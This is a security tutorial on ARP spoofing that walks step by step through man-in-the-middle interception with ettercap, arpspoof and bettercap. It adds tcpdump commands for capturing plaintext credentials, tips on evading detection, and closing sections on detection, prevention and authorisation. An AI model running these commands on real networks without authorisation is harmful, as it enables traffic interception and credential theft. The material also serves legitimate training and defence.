ARP Spoofing

Understanding ARP Spoofing - The Foundation of Network Interception

What is ARP Spoofing?

Simple Definition: ARP spoofing is a network attack where an attacker tricks devices into sending their network traffic through the attacker’s computer instead of directly to their intended destination, allowing the attacker to intercept, monitor, or modify all communications.

Technical Definition: ARP spoofing (also called ARP cache poisoning) is a Layer 2 attack that exploits the Address Resolution Protocol’s lack of authentication to send falsified ARP messages, causing target devices to associate the attacker’s MAC address with legitimate IP addresses (typically the gateway), positioning the attacker as a man-in-the-middle.

Why ARP Spoofing Works

ARP spoofing succeeds because of fundamental security weaknesses in the ARP protocol design:

  • Trust-Based Protocol: ARP operates on implicit trust - devices accept ARP responses without verification
  • No Authentication: The protocol includes no cryptographic authentication or integrity checking
  • Stateless Nature: Devices accept unsolicited ARP responses (gratuitous ARP) and update their caches immediately
  • Last Response Wins: The most recent ARP response overwrites previous entries in the cache

Attack Process Breakdown

Local Network Communication Spoofing

When spoofing communication between two local devices:

  1. Attacker sends fake ARP responses to both targets
  2. Each target updates its ARP cache with attacker’s MAC address
  3. Traffic between targets flows through attacker
  4. Attacker can intercept, modify, or forward the traffic

Gateway Spoofing for Internet Traffic Interception

Critical Concept: The most powerful ARP spoofing attacks target the default gateway, intercepting ALL internet-bound traffic from victim devices.

Why This Works: Even though destinations like google.com are on the internet, packets MUST first go to the local gateway. ARP spoofing redirects this crucial first hop.

Traffic Flow During Gateway Spoofing:

  • Normal: Victim → Gateway → Internet
  • Spoofed: Victim → Attacker → Gateway → Internet
  • Return: Internet → Gateway → Attacker → Victim

What Gets Intercepted:

  • All web browsing (HTTP/HTTPS)
  • Email communications
  • Cloud service connections
  • Software updates
  • VPN connections (before tunnel establishment)

Real-World Impact

Credential Theft: Capturing login credentials from unencrypted protocols or web forms

Session Hijacking: Stealing authentication cookies and session tokens

Data Interception: Monitoring sensitive communications, file transfers, and database queries

Network Reconnaissance: Mapping internal topology and discovering additional targets

DNS Manipulation: Redirecting domain requests before they leave the network

Technical Implementation

Prerequisites

Network Requirements:

  • Attacker must be on the same broadcast domain (subnet/VLAN) as targets
  • IP forwarding must be enabled for transparent traffic relay
  • Network interface must support promiscuous mode

Essential Tools:

  • Ettercap: Comprehensive suite for ARP spoofing
  • Arpspoof: Simple, focused ARP spoofing tool
  • Bettercap: Modern framework with web interface
  • Wireshark: Traffic analysis and verification

Essential Command Sequence

Step 1: Network Discovery 

# Identify active hosts on the network
nmap -sn 192.168.1.0/24
# -sn: Ping scan (no port scan) to quickly discover live hosts
# Sends ICMP echo, TCP SYN to port 443, TCP ACK to port 80, and ICMP timestamp
# Output: List of responding hosts with IP and MAC addresses

# Identify the default gateway
ip route | grep default
# Shows the router IP that forwards traffic to external networks
# Output example: default via 192.168.1.1 dev eth0
# This is your primary target for intercepting internet traffic

# Document current ARP table state
arp -a
# Displays current IP-to-MAC mappings in the ARP cache
# Important for verifying changes after spoofing begins
# Output format: hostname (IP) at MAC_ADDRESS [ether] on interface

Purpose: Map the network topology and identify targets before launching the attack. Nmap discovers active hosts, while arp and ip commands reveal current network state.

Step 2: Enable IP Forwarding 

# Enable packet forwarding (critical for maintaining connectivity)
echo 1 > /proc/sys/net/ipv4/ip_forward
# Writes "1" to the kernel parameter file, enabling IP forwarding
# This allows your machine to route packets between interfaces
# Without this, packets stop at your machine = DoS attack

# Alternative method using sysctl
sysctl -w net.ipv4.ip_forward=1
# -w: Write (modify) the kernel parameter
# Same effect as echo method but more formal

# Verify forwarding is enabled
sysctl net.ipv4.ip_forward
# Reads the current value of the IP forwarding parameter
# Output should be: net.ipv4.ip_forward = 1
# If 0, packets won't be forwarded and victims lose connectivity

Purpose: Without IP forwarding, intercepted packets won’t reach their destination, causing a denial of service instead of interception. The sysctl command manages kernel parameters that control packet routing behavior.

Step 3: Execute ARP Spoofing

Option A: Using Ettercap (Automated Bidirectional)

# Gateway spoofing to intercept ALL internet traffic
ettercap -T -M arp:remote /192.168.1.100// /192.168.1.1//

# Parameter breakdown:
# -T: Text interface (no GUI), uses less resources
# -M arp:remote: MITM attack using ARP spoofing in remote mode
#     remote = spoofs both directions automatically
# /192.168.1.100//: Target victim IP (double slash = all ports)
# /192.168.1.1//: Gateway IP to impersonate

# What happens internally:
# 1. Sends ARP reply to 192.168.1.100: "Gateway is at MY_MAC"
# 2. Sends ARP reply to 192.168.1.1: "192.168.1.100 is at MY_MAC"
# 3. Continuously refreshes these false ARP entries
# 4. All traffic between victim and internet flows through attacker

Option B: Using Arpspoof (Manual Control)

# Terminal 1: Spoof victim's view of gateway
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
# -i eth0: Network interface to use for sending spoofed packets
# -t 192.168.1.100: Target whose ARP cache to poison
# 192.168.1.1: IP address to impersonate (the gateway)
# Effect: Victim thinks gateway MAC = attacker's MAC

# Terminal 2: Spoof gateway's view of victim (MUST run simultaneously)
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
# -t 192.168.1.1: Target the gateway's ARP cache
# 192.168.1.100: Impersonate the victim's IP
# Effect: Gateway thinks victim MAC = attacker's MAC

# Why both directions are critical:
# Without bidirectional spoofing, return traffic bypasses attacker
# Results in broken connections and detection

Option C: Using Bettercap (Modern Approach)

# Start Bettercap interactive session
bettercap -iface eth0
# -iface eth0: Specify network interface for attacks

# In Bettercap console, execute these commands:
net.probe on                          
# Sends packets to discover all hosts on network
# Updates internal host database with IPs and MACs

set arp.spoof.targets 192.168.1.100  
# Defines which host(s) to attack
# Can use ranges: 192.168.1.100-110 or comma-separated

set arp.spoof.gateway 192.168.1.1    
# Specifies the gateway to impersonate
# Usually the default router for the network

arp.spoof on                          
# Starts sending spoofed ARP replies
# Automatically handles bidirectional spoofing

net.sniff on                          
# Activates packet capture on spoofed traffic
# Logs credentials, URLs, and other data

Step 4: Traffic Analysis 

# Monitor intercepted traffic
tcpdump -i eth0 host 192.168.1.100 and not arp
# -i eth0: Capture on ethernet interface
# host 192.168.1.100: Only packets to/from victim
# not arp: Exclude ARP packets (too noisy during spoofing)
# Shows all victim's actual data traffic flowing through attacker

# Capture credentials from unencrypted protocols
tcpdump -i eth0 -A -s 0 'tcp port 80 or tcp port 21 or tcp port 23'
# -A: Print packet content in ASCII (human-readable)
# -s 0: Capture entire packet (no size limit)
# tcp port 80: HTTP traffic (web forms, basic auth)
# tcp port 21: FTP commands (USER and PASS commands visible)
# tcp port 23: Telnet (entire session in plaintext)

# Extract SNI from HTTPS to see visited websites
tcpdump -i eth0 -nn 'tcp port 443' | grep -E "SNI"
# -nn: Don't resolve hostnames or port names (faster)
# tcp port 443: HTTPS traffic
# SNI (Server Name Indication) reveals domain names despite encryption
# Shows which websites victim visits even with HTTPS

# Use Wireshark for detailed analysis
wireshark -i eth0 -k &
# -i eth0: Capture on ethernet interface  
# -k: Start capturing immediately
# &: Run in background
# Provides GUI for deep packet inspection and protocol analysis

Purpose: Verify successful interception and analyze captured traffic for valuable information. Tcpdump provides command-line packet capture while Wireshark offers comprehensive GUI-based analysis.

Step 5: Maintaining the Attack 

# Monitor ARP cache status on attacker machine
watch -n 1 'arp -a | grep -E "(192.168.1.1|192.168.1.100)"'
# watch -n 1: Refresh output every 1 second
# arp -a: Show all ARP cache entries
# grep: Filter for victim and gateway IPs
# Verifies both targets maintain poisoned cache entries
# Should show both IPs associated with YOUR MAC address

# Verify traffic is being forwarded
netstat -i | grep eth0
# -i: Show interface statistics
# Look at RX (received) and TX (transmitted) packet counts
# Both should be increasing rapidly during active spoofing
# Errors or drops indicate forwarding problems

# Check for packet drops or errors
ip -s link show eth0
# -s: Show statistics
# Displays detailed interface metrics:
#   - RX/TX packets: Should be balanced if forwarding properly
#   - Errors: Should remain at 0
#   - Dropped: Indicates system can't keep up with traffic
#   - Overruns: Buffer overflow, reduce attack scope

Purpose: Ensure the attack remains stable and traffic continues flowing properly. The watch command provides real-time monitoring, while netstat and ip verify packet forwarding health.

Attack Variations

Multiple Target Spoofing 

# Spoof multiple victims simultaneously
ettercap -T -M arp:remote /192.168.1.100-110// /192.168.1.1//
# /192.168.1.100-110//: IP range notation
# Intercepts traffic from 11 victims at once
# Useful for capturing data from entire departments
# Warning: Higher resource usage and detection risk

Selective Service Spoofing 

# Only intercept specific ports/services
ettercap -T -M arp:remote /192.168.1.100/80,443/ /192.168.1.1//
# /80,443/: Only HTTP and HTTPS traffic
# Reduces processing load and noise
# Less likely to cause network performance issues
# Ideal for targeted web credential harvesting

One-Way Spoofing (Stealthier) 

# Only spoof victim's view of gateway (reduces ARP traffic)
ettercap -T -M arp:oneway /192.168.1.100// /192.168.1.1//
# arp:oneway: Spoofs only victim → gateway direction
# Reduces ARP packet volume by 50%
# Lower detection probability
# Note: Only captures outbound traffic, not responses

Common Issues and Solutions

Problem: No traffic being intercepted

  • Solution: Verify IP forwarding is enabled and both directions are being spoofed

Problem: Network becomes slow or unstable

  • Solution: Reduce spoofing frequency or target fewer hosts

Problem: Target loses connectivity

  • Solution: Ensure bidirectional spoofing is active and packets are being forwarded

Problem: Attack detected by security tools

  • Solution: Use one-way spoofing, reduce ARP packet frequency, or target specific services

Detection and Prevention

Detection Indicators

  • Duplicate ARP responses for the same IP
  • MAC address changes for known hosts
  • Increased ARP traffic volume
  • Network performance degradation
  • ARP table inconsistencies

Prevention Measures

Network Level:

  • Enable Dynamic ARP Inspection (DAI) on switches
  • Implement DHCP Snooping
  • Use static ARP entries for critical systems
  • Deploy network segmentation with VLANs

Host Level:

  • Deploy ARP monitoring tools (arpwatch)
  • Configure static ARP entries for gateway
  • Enable ARP spoofing detection in security software
  • Use VPN connections to encrypt traffic

Professional Context

Legitimate Use Cases

  • Penetration Testing: Validating network security controls
  • Security Assessments: Demonstrating impact of missing protections
  • Red Team Exercises: Simulating real-world attacks
  • Network Troubleshooting: Analyzing traffic flows

Legal and Ethical Requirements

Authorization: Always obtain explicit written permission before conducting ARP spoofing Scope: Clearly define target systems and acceptable actions Data Handling: Properly handle any intercepted sensitive information Reporting: Document findings and provide remediation recommendations

ARP spoofing remains a fundamental network attack technique that security professionals must understand for both offensive assessment and defensive implementation. While powerful, it requires careful execution and proper authorization in professional contexts.